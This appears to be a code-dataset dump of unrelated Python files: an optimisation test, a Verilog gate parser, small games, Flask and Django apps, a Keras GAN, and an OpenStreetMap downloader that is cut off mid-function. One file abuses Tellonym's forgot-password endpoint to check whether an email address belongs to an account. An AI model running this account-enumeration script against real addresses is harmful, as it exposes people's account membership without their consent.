text stringlengths 8 6.05M |
|---|
import operator
from bert_serving.client import BertClient
import configparser
import json
import numpy as np
def create_2_freq():
config = configparser.ConfigParser()
config.read("paths.cfg")
with open(config["paths"]["triple_string_cpnet_json"], "r", encoding="utf8") as f:
triple_str_json = json.load(f)
print("Read " + str(len(triple_str_json)) + " triple strings.")
concept_2_freq = {}
relation_2_freq = {}
for data in triple_str_json:
words = data["string"].strip().split(" ")
subj_start = data["subj_start"]
subj_end = data["subj_end"]
obj_start = data["obj_start"]
obj_end = data["obj_end"]
subj = "_".join(words[subj_start:subj_end])
obj = "_".join(words[obj_start:obj_end])
rel = data["rel"]
if subj not in concept_2_freq:
concept_2_freq[subj] = 0
concept_2_freq[subj] += 1
if obj not in concept_2_freq:
concept_2_freq[obj] = 0
concept_2_freq[obj] += 1
if rel not in relation_2_freq:
relation_2_freq[rel] = 0
relation_2_freq[rel] += 1
with open(config["paths"]["concept_2_freq"], "w", encoding="utf8") as f:
sorted_x = sorted(concept_2_freq.items(), key=operator.itemgetter(1), reverse=True)
for w, fre in sorted_x:
f.write("%s\t%d\n"%(w, fre))
with open(config["paths"]["relation_2_freq"], "w", encoding="utf8") as f:
sorted_x = sorted(relation_2_freq.items(), key=operator.itemgetter(1), reverse=True)
for w, fre in sorted_x:
f.write("%s\t%d\n"%(w, fre))
if __name__ == "__main__":
create_2_freq()
|
#!/usr/bin/python
#qplot -x -3d -s 'set xlabel "x";set ylabel "y";set view equal xy' outcmaes_obj.dat w l outcmaes_res.dat ps 3 data/res000{0,1,2,3,5,6}.dat -showerr
#TEST to use stored solutions and scores data
import cma
import numpy as np
def fobj1(x,f_none=None):
assert len(x)==2
#if (x[0]-0.5)**2+(x[1]+0.5)**2<0.2: return f_none
return 3.0*(x[0]-1.2)**2 + 2.0*(x[1]+2.0)**2
def frange(xmin,xmax,num_div):
return [xmin+(xmax-xmin)*x/float(num_div) for x in range(num_div+1)]
#fobj= cma.fcts.rosen
fobj= fobj1
using_init= True
#init_x0= [ 1.35091082, -1.64772063]
#init_sigma0= [ 0.28612504, 1.11171478]
##popsize-1:
#init_solutions0= [
#np.array([1.19997522269, -0.91075646271]),
#np.array([1.20312824671, -1.87495850026]),
#np.array([1.41625771099, -1.65410726357]),
#np.array([1.74571448699, -1.73080568194]),
#np.array([1.1541920869, -0.648801324059])]
#init_score0= [
#2.372903,
#0.031300,
#0.379586,
#1.038344,
#3.657771]
##1.62588423219 0.185635118507 10.098134
init_x0= [1.6,2.5]
init_sigma0= [0.25,0.5]
#popsize-1:
init_solutions0= [
np.array([1.15577068683, 2.78306227797]),
np.array([1.97053342159, 1.51965484274]),
np.array([1.56030150378, 2.90707053744]),
np.array([1.5699010727, 2.90721893587 ]),
np.array([1.99722431459, 2.95065252211])]
init_score0= [
45.761238,
26.557106,
48.548134,
48.572076,
50.924621]
#1.17593719841, 2.33528811379 37.591183
options = {'CMA_diagonal':1, 'verb_time':0}
options['bounds']= [[-3.0,-3.0],[3.0,3.0]]
options['tolfun']= 1.0e-4 # 1.0e-4
#options['verb_log']= False
options['scaling_of_variables']= np.array([0.5,1.0])
#options['scaling_of_variables']= np.array([0.00001,1.0])
#options['popsize']= 200
#typical_x= [0.0,0.0]
#options['typical_x']= np.array(typical_x)
scale0= 0.5
#parameters0= [0.0,0.0]
#parameters0= [1.19,-1.99]
parameters0= [1.6,2.5]
if using_init:
parameters0= init_x0
scale0= 1.0
options['scaling_of_variables']= init_sigma0
es= cma.CMAEvolutionStrategy(parameters0, scale0, options)
solutions, scores = [], []
if using_init:
assert(len(init_solutions0)==len(init_score0))
es.ask(len(init_solutions0))
solutions= init_solutions0
scores= init_score0
#es.tell(solutions,scores)
print 'es.result():',es.result()
count= 0
while not es.stop():
#while len(solutions) < es.popsize+3: #This is OK
while len(solutions) < es.popsize:
#curr_fit = None
#while curr_fit in (None, np.NaN):
x = es.ask(1)[0]
#curr_fit = cma.fcts.somenan(x, cma.fcts.elli) # might return np.NaN
f= fobj(x)
if f is not None:
solutions.append(x)
scores.append(f)
es.tell(solutions, scores)
es.disp()
print 'es.result()@%i:'%(count),es.result()
#print solutions
#if count%5==0:
#print '[%i]'%count, ' '.join(map(str,solutions[0]))
fp= file('data/res%04i.dat'%(count),'w')
count+=1
for x in solutions:
fp.write('%s %f\n' % (' '.join(map(str,x)),fobj(x,-10)))
fp.close()
solutions, scores = [], []
res= es.result()
print 'best solutions = ', res[0]
print 'best solutions fitness = %f' % (res[1])
print res
fp= file('outcmaes_obj.dat','w')
for x1 in frange(-4.0,4.0,100):
for x2 in frange(-4.0,4.0,100):
x= np.array([x1,x2])
fp.write('%s %f\n' % (' '.join(map(str,x)),fobj(x,-10)))
fp.write('\n')
fp.close()
fp= file('outcmaes_res.dat','w')
#for x in res[0]:
x= res[0]
fp.write('%s %f\n' % (' '.join(map(str,x)),fobj(x,-10)))
fp.close()
cma.plot();
print 'press a key to exit > ',
raw_input()
#cma.savefig('outcmaesgraph')
|
import z3
from functools import *
MODE_ACC = False # enum input for higher acc
def portType(group, func):
if group == 'Y' or group == 'CO' or (group == 'S' and (func == 'ADDF' or func == 'ADDH')):
return 'output'
return 'input'
class Logic:
"""
rules:
class1:
out = func(ins)
class2:
X1 X2 | ddd
not by input N
out = X2(X1(group1), X1(group2), ...)
len(group1)len(group2)... = ddd
class3
MX MXT MXIT
out = (not) in[s]
class4
out = in
class5
CO = in1 in2 + in2 in3 + in1 in3
out = xor(in)
"""
LogicPrefix = [
'XOR', 'OR', 'NAND', 'AND','XNOR', 'NOR', # class 1
'AOI', 'AO',
'OAI', 'OA', # class 2
'MXIT','MXT', 'MX', # class 3
'BUFH','BUF', 'INV', # class 4
'ADDF', 'ADDH' # class 5
]
LogicClass = {
'XOR': 1, 'OR': 1, 'NAND': 1, 'AND': 1,'XNOR': 1, 'NOR': 1,
'AOI': 2, 'AO': 2,
'OAI': 2, 'OA': 2, # class 2
'MXIT': 3,'MXT': 3, 'MX': 3, # class 3
'BUFH': 4,'BUF': 4, 'INV': 4, # class 4
'ADDH': 5, 'ADDF': 6 # class 5/6
}
BasicP = {
'XOR': lambda I1, I2 : 1 - (I1) * (I2) - (1-(I1)) * (1-(I2)),
'OR': lambda I1, I2 : 1 - (1 - (I1)) * (1 - (I2)),
'AND': lambda I1, I2 : (I1) * (I2),
'INV': lambda I1: 1 - (I1),
'BUF': lambda I1: (I1),
'MX': lambda I1, I2, SW: (SW) * (I2) + (1-(SW)) * (I1)# SW == 0 => I1
}
BasicA = {
'XOR': lambda I1, I2 : (I1) ^ (I2),
'OR': lambda I1, I2 : (I1) or (I2),
'AND': lambda I1, I2 : (I1) and (I2),
'INV': lambda I1: not (I1),
'BUF': lambda I1: (I1),
'MX': lambda I1, I2, SW: (I2) if SW else (I1)
}
BasicZ3 = {
'XOR': lambda I1, I2 : z3.Xor((I1), (I2)),
'OR': lambda I1, I2 : z3.Or((I1), (I2)),
'AND': lambda I1, I2 : z3.And((I1), (I2)),
'INV': lambda I1: z3.Not((I1)),
'BUF': lambda I1: (I1),
'MX': lambda I1, I2, SW: z3.Or(z3.And((SW), (I2)), z3.And(z3.Not((SW)), (I1)))
}
def parseFunc(self,fn):
for i in Logic.LogicPrefix:
if fn.startswith(i):
self.func = i
self.para = fn[len(i):]
self.para = re.sub('\D','', self.para)
self.lclass = Logic.LogicClass[self.func]
return
assert False # unknown func type !!
def statement(self):
a1 = self.func + self.para + " "
a1 += self.define['name'] + ' ('
def processArg(arg):
sub = []
for i in arg:
for j in arg[i]:
sub.append("." + j['group'] + str(j['id']) + ('N' if j['inv'] else '') + "(" + j['name'] + ')')
return ', '.join(sub)
a1 += processArg(self.define['argsIn']) + ', ' + processArg(self.define['argsOut']) + ' );'
return a1
def __init__(self, define):
self.name = define['name']
# Define {func:string, name:strig, argsIn: Args, argsOut: Args}
# Args {A: [Arg], B: [Arg], C:[Arg], ...}
# Arg {group:string, id:int, name: name (name in net), inv: bool, type:input/output}
self.define = define
self.inputs = []
for i in define['argsIn']:
for j in define['argsIn'][i]:
self.inputs.append(j['name'])
self.outputs = []
for i in define['argsOut']:
for j in define['argsOut'][i]:
self.outputs.append(j['name'])
self.parseFunc(define['func'])
#if self.name == 'U5069':
# print(self.define['argsIn'])
# self.define['argsIn']['D'][0].inv = False
self.acc_mode_cache = {k:[] for k in self.outputs}
if (MODE_ACC):
for i in range(0, 2 ** len(self.inputs)):
inx = []
k = i
for j in range(0, len(self.inputs)):
inx.append((k % 2) == 1)
k //= 2
inmap = {k: v for k,v in zip(self.inputs, inx)}
rst = self.eval(lambda I: inmap[I])
for k in rst:
if rst[k]:
self.acc_mode_cache[k].append(inx)
def __str__(self):
outs = ""
outs += " > Logic: " + self.name + "(" + self.func + ", " + self.para + ")" + "\n"
outs += " > Inputs: \n"
innames = []
for gsi in self.define['argsIn']:
for ii in self.define['argsIn'][gsi]:
nn = "N" if ii['inv'] else ""
outs += " >" + ii['group'] + str(ii['id']) + " " + (nn) + ": " + ii['name'] + "\n"
innames.append(ii['name'])
outs += " > Outputs: \n"
statP = {}
for gsi in self.define['argsOut']:
for ii in self.define['argsOut'][gsi]:
nn = "N" if ii['inv'] else ""
outs += " >" + ii['group'] + str(ii['id']) + " " + (nn) + ": " + ii['name'] + "\n"
statP[ii['name']] = 0
outs += " Input = " + ", ".join(innames) + "\n"
for i in range(0, 2 ** len(innames)):
k = i
outs += " Input = "
iis = []
invals = {}
for j in range(0, len(innames)):
invals[innames[j]] = ((k % 2) == 1)
iis.append(str(k % 2))
k //= 2
outs += ", ".join(iis)
evals = self.eval(lambda I: invals[I])
for ii in evals:
if evals[ii]:
statP[ii] = statP[ii] + 1
outs += " => " + str(evals) + "\n"
outP = self.getPossible(lambda I: 0.5)
outPa = [statP[i] / (2 ** len(innames)) for i in statP]
outs += " OutputP = " + str(outP) + ", OutputPACC = " + str(outPa)
return outs
def getRunFunc(self):
# class 1, 3, 4 only
assert self.lclass == 1 or self.lclass == 3 or self.lclass == 4
runFunc = self.func
postNot = False
if runFunc == 'XNOR':
runFunc = 'XOR'
postNot = True
if runFunc == 'NAND':
runFunc = 'AND'
postNot = True
if runFunc == 'NOR':
runFunc = 'OR'
postNot = True
if runFunc == 'MXT':
runFunc = 'MX'
if runFunc == 'BUFH':
runFunc = 'BUF'
if runFunc == 'MXIT':
runFunc = 'MX'
postNot = True
return runFunc, postNot
def getRunSteps(self):
# class == 2
assert self.lclass == 2
decode = {'A': 'AND', 'O':'OR'}
s1 = decode[self.func[0]]
s2 = decode[self.func[1]]
postNot = len(self.func) == 3 and self.func[2] == 'I'
return s1,s2,postNot
# some input maybe invert input
def getInputWithINV(self, state, fNOT, arg):
val = state(arg['name'])
if (arg['inv']):
val = fNOT(val)
return val
# class2 is grouped in groups
def applyClass2(self, state, fX1, fX2, fNOT, inv):
s2_inputs = []
xlogs = ""
for gsi in self.define['argsIn']:
gs = self.define['argsIn'][gsi]
if len(gs) == 1:
s2_inputs.append(self.getInputWithINV(state, fNOT, gs[0]))
else:
s1_grouped_inputs = [self.getInputWithINV(state, fNOT, ga) for ga in gs]
xlogs += str(s1_grouped_inputs)
s1_val = reduce(fX1, s1_grouped_inputs)
s2_inputs.append(s1_val)
val = reduce(fX2, s2_inputs)
if inv:
val = fNOT(val)
return val
def getAllInputs(self,state,fNOT):
ins = []
for i in self.define['argsIn']:
argsi = self.define['argsIn'][i]
for j in argsi:
ins.append(self.getInputWithINV(state, fNOT, j))
return ins
def applyGen(self, state, fGroup):
if self.lclass == 1:
runFunc, postNot = self.getRunFunc()
in_vals = self.getAllInputs(state, fGroup['INV'])
val = reduce(fGroup[runFunc], in_vals)
if postNot:
val = fGroup['INV'](val)
return {self.outputs[0]: val}
if self.lclass == 3:
runFunc, postNot = self.getRunFunc()
in_vals = ['A', 'B', 'S']
in_vals = [self.getInputWithINV(state, fGroup['INV'], (self.define['argsIn'][i][0])) for i in in_vals]
val = fGroup[runFunc](*in_vals)
if postNot:
val = fGroup['INV'](val)
return {self.outputs[0]: val}
if self.lclass == 2:
x1, x2, postNot = self.getRunSteps()
val = self.applyClass2(state, fGroup[x1], fGroup[x2], fGroup['INV'], postNot)
return {self.outputs[0]: val}
if self.lclass == 4:
runFunc, _ = self.getRunFunc()
val = fGroup[runFunc](*self.getAllInputs(state, fGroup['INV']))
return {self.outputs[0]: val}
if self.lclass == 5: # ADDH
in_vals = ['A', 'B']
x1,x2 = [self.getInputWithINV(state, fGroup['INV'], (self.define['argsIn'][i][0])) for i in in_vals]
s = fGroup['XOR'](x1, x2)
co = fGroup['AND'](x1, x2)
rst = {'S': s, 'CO': co}
rst = {self.define['argsOut'][k][0]['name']: rst[k] for k in self.define['argsOut']}
return rst
if self.lclass == 6: # ADDF
in_vals = ['A', 'B', 'CI']
x1,x2,ci = [self.getInputWithINV(state, fGroup['INV'], (self.define['argsIn'][i][0])) for i in in_vals]
x1xx2 = fGroup['XOR'](x1, x2)
s = fGroup['XOR'](x1xx2, ci)
co = fGroup['OR'](fGroup['AND'](x1xx2, ci), fGroup['AND'](x1,x2))
rst = {'S': s, 'CO': co}
rst = {self.define['argsOut'][k][0]['name']: rst[k] for k in self.define['argsOut']}
return rst
def getPossible(self, state):
if (MODE_ACC):
inP = [state(i) for i in self.inputs]
ouP = {}
for o in self.outputs:
sop = 0
for j in self.acc_mode_cache[o]:
op = 1
for val, p in zip(self.inputs, inP):
if val:
op *= p
else:
op *= 1 - p
sop += op
ouP[o] = sop
return ouP
if (self.lclass == 6):
# special workaround for adder
in_vals = ['A', 'B', 'CI']
x1,x2,ci = [state(self.define['argsIn'][i][0]['name']) for i in in_vals]
x1xx2 = Logic.BasicP['XOR'](x1, x2)
s = Logic.BasicP['XOR'](x1xx2, ci)
co = 0
for v1 in range(0, 2):
for v2 in range(0, 2):
for v3 in range(0, 2):
if v1 + v2 + v3 > 1:
p1 = x1 if v1 == 1 else 1-x1
p2 = x2 if v2 == 1 else 1-x2
p3 = ci if v3 == 1 else 1-ci
co += p1 * p2 * p3
rst = {'S': s, 'CO': co}
rst = {self.define['argsOut'][k][0]['name']: rst[k] for k in self.define['argsOut']}
return rst
else:
return self.applyGen(state, Logic.BasicP)
def eval(self, state):
return self.applyGen(state, Logic.BasicA)
def z3Interface(self, state):
return self.applyGen(state, Logic.BasicZ3)
import re
rParseName = r"\.(?P<G>[a-mo-zA-MO-Z]+)(?P<Id>\d*)(?P<N>N){0,1}\((?P<Src>.+?)\)"
class VerilogParser:
"""
"Verilog" Parser for logic cells
"""
def __init__(self):
self.allFunc = set()
def parseLine(self, l):
if not l:
return
l = l.replace('((', '( (').replace('))', ') )')
words = [x.strip() for x in re.split('\s|,|\*', l) if x.strip()]
if (not words):
return
if (words[-1].endswith(';')):
lst = words.pop()
lst = lst[:-1]
words.append(lst)
words.append(';')
curObject = None
for w in words:
if (self.state == 'free'):
if (w == 'module'):
return # skip
if (w == 'endmodule'):
self.state = 'over'
return # over
if (w == 'input'):
self.state = 'input'
continue
if (w == 'output'):
self.state = 'output'
continue
if (w == 'wire'):
return # skip
self.curObject = {'func': w.split('_')[0], 'name':'unknown', 'argsIn':{}, 'argsOut':{}}
self.allFunc.add(self.curObject['func'])
self.state = 'parseLogic0'
continue
if self.state == 'parseLogic0':
self.curObject['name'] = w
self.state = 'parseLogic1'
continue
if self.state == 'parseLogic1':
if (w == '('):
self.state = 'parseLogic2'
continue
if self.state == 'parseLogic3':
if self.matches:
g = self.matches.group('G')
sid = self.matches.group('Id') or 0
nn = not not self.matches.group('N')
src = self.matches.group('Src') or ''
obj = {'group': g, 'id': int(sid), 'name': src, 'inv': nn, 'type': portType(g, self.curObject['func'])}
typeName = 'argsIn' if obj['type'] == 'input' else 'argsOut'
if (not g in self.curObject[typeName]):
self.curObject[typeName][g] = []
self.curObject[typeName][g].append(obj)
self.wire.add(src)
if not (src in self.wireIn):
self.wireIn[src] = set()
if (obj['type'] == 'input'):
self.wireIn[src].add(self.curObject['name'])
else:
self.wireOut[src] = self.curObject['name']
self.state = 'parseLogic2' # fallback to 2
else:
self.matched += w
self.matches = re.match(rParseName, self.matched)
continue # add and match
if self.state == 'parseLogic2':
if (w == ')'):
self.state = 'free'
self.ops.append(self.curObject)
self.curObject = None
return # skip
else:
self.matched = w
# (:G)(:Id)(:N)\(Src\)
self.matches = re.match(rParseName, self.matched)
self.state = 'parseLogic3'
continue
if self.state == 'input':
if (w.startswith('keyinput')):
self.keyInput.add(w)
else:
self.input.add(w)
continue
if self.state == 'output':
self.output.add(w)
continue
self.state = 'free'
def parseVerilog(self, lines):
self.ops = []
self.input = set()
self.output = set()
self.keyInput = set()
self.wire = set()
self.wireOut = {}
self.wireIn = {}
lines = [l.strip() for l in lines]
lines = [l.split('//', 1)[0].strip() for l in lines]
lines = [l for l in lines if l]
lines = "".join(lines).split(';')
for l in lines:
self.state = 'free'
self.parseLine(l)
self.ops = [Logic(i) for i in self.ops]
self.opMap = {i.name: i for i in self.ops}
# print(self.opMap['U3454'])
if __name__ == "__main__":
### test only !!!
import os
import glob
allFuncs = set()
testl1 = Logic({'name': 'U6708', 'argsOut': {'Y': [{'name': 'U3453', 'inv': False, 'group': 'Y', 'type': 'output', 'id': 0}]}, 'argsIn': {'A': [{'name': 'STATE2_REG_0__SCAN_IN', 'inv': False, 'group': 'A', 'type': 'input', 'id': 0}, {'name': 'n6217', 'inv': False, 'group': 'A', 'type': 'input', 'id': 1}, {'name': 'n5577', 'inv': False, 'group': 'A', 'type': 'input', 'id': 2}], 'B': [{'name': 'n7072', 'inv': False, 'group': 'B', 'type': 'input', 'id': 0}, {'name': 'n6217', 'inv': False, 'group': 'B', 'type': 'input', 'id': 1}]}, 'func': 'AOI32'})
print(str(testl1))
for filename in glob.glob(os.path.join(os.getcwd(), 'verilog', '*.v')):
print('processing ' + filename )
f = open(filename)
parser = VerilogParser()
parser.parseVerilog(f.readlines())
print(' > input size: ' + str(len(parser.input)))
print(' > output size: ' + str(len(parser.output)))
print(' > key size: ' + str(len(parser.keyInput)))
print(' > ops size: ' + str(len(parser.ops)))
print(' > wire size: ' + str(len(parser.wire)))
allFuncs = allFuncs | parser.allFunc
for x in parser.ops:
if x.func + x.para == 'INV':
print(str(x))
import sys
sys.exit(0)
# test func
f.close()
for f in allFuncs:
print(f)
#{'NOR3', 'NOR2', 'ADDH', 'ADDF', 'NAND4', 'INV'}
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Author: Eason
def str(var1,*vartuple):
print var1
for var in vartuple:
print var
print "=" * 20
print "输出定义的变量:"
print "=" * 20
str(10)
print "=" * 20
print "输出所有未定义的变量:"
print "=" * 20
str(20,30,40)
print "=" * 20 |
# Import yfinance
import yfinance as yf
import pandas as pd
data = yf.download("ABEV3.SA", start="2020-08-01", end="2020-08-30")
print(type(data))
print(data)
print(data['High'])
print(data[['Low']])
print(data.iloc[1])
print(data.iloc[1][0])
tickers = {"F", "WFC", "GM"}
for ticker in tickers:
ticker_yahoo = yf.Ticker(ticker)
data = ticker_yahoo.history()
last_quote = (data.tail(1)['Close'].iloc[0])
print(ticker,last_quote)
|
class Node:
def __init__(self, data, next_node=None):
self.data = data
self.next = next_node
def find_circle_head(head):
seen_nodes = set()
while head is not None:
if head in seen_nodes:
return head
seen_nodes.add(head)
head = head.next
if __name__ == '__main__':
node_a = Node('A', Node('B', Node('C', Node('D', Node('E')))))
node_c = node_a.next.next
node_e = node_c.next.next
node_e.next = node_c
print(find_circle_head(node_a).data)
|
import requests
# Importing requests
url = "https://api.tellonym.me/accounts/forgotpassword"
# Check Email Linked API URL
headers = {
"Host": "api.tellonym.me",
"Content-Type": "application/json",
"Accept": "application/json",
"Connection": "keep-alive",
"tellonym-client": "ios:2.65.0:488:14:iPhone13,3",
"User-Agent": "Tellonym/488 CFNetwork/1206 Darwin/20.1.0",
"Accept-Language": "en",
}
# Check Email Linked API Headers
email = input("Email: ")
# Email Input
data = {
"email": email,
"limit": 16
}
# Check Email Linked API Data
req = requests.post(url, json=data, headers=headers)
# Check Email Linked API Request
if req.status_code == 200:
print("Linked Email !")
# Linked Email
elif "PARAMETER_MISSING" in req.text:
print("Missing Something, Try Again")
# Missing Data
elif "The entry you were looking for could not be found." in req.text:
print("Not Linked Email !")
# Not Linked
else:
print("Error !")
print(req)
print(req.text)
# Error or Something Wrong
|
import random
import sys
n=6
row=1
col=0
pos=0
col_s=0
f=0
d=0
roll_again = "yes"
flag=[[0 for j in range(n)] for i in range(n)]
def check( flag ):
count=0
for i in range(n):
count=0
for j in range(n):
if(flag[i][j]==1):
count=count+1
if(count==n):
print ("The row %d was completely visited\n" %i)
return 1
for i in range(n):
count=0
for j in range(n):
if(flag[j][i]==1):
count=count+1
if(count==n):
print ("The column %d was completely visited\n" %i)
return 1
return 0
print ("Your initial position is 0,0")
while (roll_again=="yes"):
print ("Rolling Dice .....")
rnd=(int)(((random.random()*100)%6)+1)
print ("Dice value is %d" %rnd)
if((pos+rnd)>(n*n)):
row=1
col=0
rnd=((pos+rnd)-(n*n))
pos=0
pos=pos+rnd
col=col+rnd
if(col>n):
col=col%n
row=row+1
if(row%2==0):
col_s=n+1-col
else:
col_s=col
print ("Your current position is %d,%d" %(row-1,col_s-1))
flag[row-1][col_s-1]=1
f=check(flag)
if(f==1):
var=input("game ends")
quit()
d=0
roll_again = input("Enter yes if you want to roll again :")
print ("Your final position is %d,%d" %(row-1,col_s-1)) |
from flask import Flask, session, request, redirect, render_template
import random
app=Flask(__name__)
app.secret_key='macbook'
@app.route('/')
def index():
return render_template('index.html')
@app.route('/win')
def win():
return render_template('win.html', win=session['win'], lose=session['lose'], tie=session['tie'])
@app.route('/lose')
def lose():
return render_template('lose.html', win=session['win'], lose=session['lose'], tie=session['tie'])
@app.route('/tie')
def tie():
return render_template('tie.html', win=session['win'], lose=session['lose'], tie=session['tie'])
@app.route('/player2', methods=['POST'])
def player2():
if 'win' not in session:
session['win'] = 0
if 'lose' not in session:
session['lose'] = 0
if 'tie' not in session:
session['tie'] = 0
if 'rock' in request.form:
session['clicked'] = 'rock'
elif 'paper' in request.form:
session['clicked'] = 'paper'
else:
session['clicked'] = 'scissors'
cpu = random.randrange(1,3)
if cpu == 1:
session['cpu'] = 'rock'
elif cpu == 2:
session['cpu'] = 'paper'
else:
session['cpu'] = 'scissors'
if session['cpu'] == session['clicked']:
session['tie'] += 1
return redirect('/tie')
elif session['cpu'] == 'rock' and session['clicked'] == 'paper':
session['win'] += 1
return redirect('/win')
elif session['cpu'] == 'rock' and session['clicked'] == 'scissors':
session['lose'] += 1
return redirect('/lose')
elif session['cpu'] == 'paper' and session['clicked'] == 'rock':
session['lose'] += 1
return redirect('/lose')
elif session['cpu'] == 'paper' and session['clicked'] == 'scissors':
session['win'] += 1
return redirect('/win')
elif session['cpu'] == 'scissors' and session['clicked'] == 'rock':
session['win'] += 1
return redirect('/win')
elif session['cpu'] == 'scissors' and session['clicked'] == 'paper':
session['lose'] += 1
return redirect('/lose')
@app.route('/reset')
def reset():
session['win'] = 0
session['lose'] = 0
session['tie'] = 0
return redirect('/')
app.run(debug=True)
|
from django.shortcuts import render, get_object_or_404, redirect, reverse
import os
from django.utils import timezone
from .models import Feature, Comment
from .forms import AddFeatureForm, AddFeatureCommentForm
from django.conf import settings
import stripe
import datetime
stripe.api_key = settings.STRIPE_SECRET_KEY.replace("'", "")
# Create your views here.
def features(request):
features = Feature.objects.order_by('-upvotes')
comments = Comment.objects.order_by('-created_date')
return render(request, "features.html", {'features': features, 'comments': comments})
def upvote_feature(request, pk):
feature = get_object_or_404(Feature, pk=pk)
key = settings.STRIPE_PUBLISHABLE_KEY
return render(request, "upvotefeature.html", {'key': key, 'feature': feature})
def payment(request, pk):
feature = get_object_or_404(Feature, pk=pk)
feature.upvotes += 1
feature.save()
if request.method == 'POST':
payment = stripe.Charge.create(
amount=500,
currency='gbp',
description='Payment for a feature upvote',
source=request.POST['stripeToken']
)
return render(request, 'payment.html', {'feature': feature})
def create_or_edit_feature(request, pk=None):
feature = get_object_or_404(Feature, pk=pk) if pk else None
if request.method == "POST":
form = AddFeatureForm(request.POST, request.FILES, instance=feature)
if form.is_valid():
feature = form.save()
return redirect(features)
else:
form = AddFeatureForm(instance=feature)
return render(request, 'addfeature.html', {'form': form})
def add_comment(request, pk):
form = AddFeatureCommentForm(request.POST)
if request.method == "POST":
form = AddFeatureCommentForm(request.POST)
form.contents = request.POST.get('contents')
form.user = request.POST.get('user')
if form.is_valid():
form.save()
return redirect(reverse('features'))
return redirect(reverse('features'))
def mark_done_feature(request, pk):
feature = get_object_or_404(Feature, pk=pk)
feature.status = request.POST.get("status")
feature.completed_date = datetime.datetime.now()
feature.save()
return redirect(reverse('features'))
def mark_doing_feature(request, pk):
feature = get_object_or_404(Feature, pk=pk)
feature.status = request.POST.get("status")
feature.save()
return redirect(reverse('features')) |
from keras.initializers import RandomNormal
from keras.models import Model
from keras.models import Input
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU
from keras.layers import Activation
from keras.layers import Concatenate
from keras_contrib.layers.normalization.instancenormalization import InstanceNormalization
from utils import ReflectionPadding2D
class Gan():
def __init__(self):
img_shape = (opt.img_rows, opt.img_cols, opt.channels)
def build_discriminator(img_shape):
'Define the Discriminator model'
# initialization weight
init = RandomNormal(stddev=0.02)
# input_image
in_image = Input(shape=img_shape)
def disc_layer(in_image, out_channels, strides=(2,2), instance_norm=True, initializer=init):
'Layer for building Discriminator'
d = Conv2D(out_channels, kernel_size=(4,4), strides=strides, padding='same', kernel_initializer=initializer)(in_image)
if instance_norm:
d = InstanceNormalization(axis=-1)(d)
d = LeakyReLU(alpha=0.2)(d)
return d
# convolutions layers
d = disc_layer(in_image, 64, instance_norm=False)
d = disc_layer(d, 128)
d = disc_layer(d, 256)
d = disc_layer(d, 512)
d = disc_layer(d, 512, strides=(1,1))
# output layer
out = Conv2D(1, 4, padding='same', kernel_initializer=init)(d)
# define model
model = Model(in_image, out)
return model
def build_generator(img_shape, n_resnet=9):
'Define the Generator model'
# initialization weight
init = RandomNormal(stddev=0.02)
# input_image
in_image = Input(shape=img_shape)
def resnet_block(n_filters, input_layer, initializer=init):
'Residual Connection block for building generator'
# first layer
rb = Conv2D(filters=n_filters, kernel_size=3, padding='same', kernel_initializer=initializer)(input_layer)
rb = InstanceNormalization(axis=-1)(rb)
rb = Activation('relu')(rb)
# second layer
rb = Conv2D(filters=n_filters, kernel_size=3, padding='same', kernel_initializer=initializer)(rb)
rb = InstanceNormalization(axis=-1)(rb)
# residual connection
rb = Concatenate()([rb, input_layer])
return rb
def main_block(input_layer, in_features=64, downsampling=True, initializer=init):
'Downsampling or Upsampling block'
if downsampling == True:
out_features = in_features*2
g = Conv2D(out_features, kernel_size=3, strides=(2,2), padding='same', kernel_initializer=initializer)(input_layer)
elif downsampling == False:
out_features = in_features//2
g = UpSampling2D(size=2, interpolation='bilinear')(input_layer)
g = ReflectionPadding2D()(g)
g = Conv2D(out_features, kernel_size=3, strides=1, padding='valid', kernel_initializer=initializer)(g)
g = InstanceNormalization(axis=-1)(g)
g = Activation('relu')(g)
return g
# c7s1-64
g = Conv2D(64, (7,7), padding='same', kernel_initializer=init)(in_image)
g = InstanceNormalization(axis=-1)(g)
g = Activation('relu')(g)
# d128
g = main_block(input_layer=g, in_features=64, downsampling=True)
# d256
g = main_block(input_layer=g, in_features=128, downsampling=True)
# R256
for _ in range(n_resnet):
g = resnet_block(256, g)
# u128
g = main_block(input_layer=g, in_features=256, downsampling=False)
# u64
g = main_block(input_layer=g, in_features=128, downsampling=False)
# c7s1-3
g = Conv2D(3, (7,7), padding='same', kernel_initializer=init)(g)
g = InstanceNormalization(axis=-1)(g)
out_image = Activation('tanh')(g)
model = Model(in_image, out_image)
return model |
'''
https://gist.github.com/Tofull/49fbb9f3661e376d2fe08c2e9d64320e
'''
## Modules
# Elementary modules
from math import radians, cos, sin, asin, sqrt
import copy
# Graph module
import networkx
# Specific modules
import xml.sax # parse osm file
from pathlib import Path # manage cached tiles
def haversine(lon1, lat1, lon2, lat2, unit_m = True):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees)
default unit : km
"""
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
r = 6371 # Radius of earth in kilometers. Use 3956 for miles
if (unit_m):
r *= 1000
return c * r
def download_osm(left, bottom, right, top, proxy = False, proxyHost = "10.0.4.2", proxyPort = "3128", cache = False, cacheTempDir = "/tmp/tmpOSM/", verbose = True):
""" Return a filehandle to the downloaded data from osm api."""
import urllib.request # To request the web
if (cache):
## cached tile filename
cachedTileFilename = "osm_map_{:.8f}_{:.8f}_{:.8f}_{:.8f}.map".format(left, bottom, right, top)
if (verbose):
print("Cached tile filename :", cachedTileFilename)
Path(cacheTempDir).mkdir(parents = True, exist_ok = True) ## Create cache path if not exists
osmFile = Path(cacheTempDir + cachedTileFilename).resolve() ## Replace the relative cache folder path to absolute path
if osmFile.is_file():
# download from the cache folder
if (verbose):
print("Tile loaded from the cache folder.")
fp = urllib.request.urlopen("file://"+str(osmFile))
return fp
if (proxy):
# configure the urllib request with the proxy
proxy_handler = urllib.request.ProxyHandler({'https': 'https://' + proxyHost + ":" + proxyPort, 'http': 'http://' + proxyHost + ":" + proxyPort})
opener = urllib.request.build_opener(proxy_handler)
urllib.request.install_opener(opener)
request = "http://api.openstreetmap.org/api/0.6/map?bbox=%f,%f,%f,%f"%(left,bottom,right,top)
if (verbose):
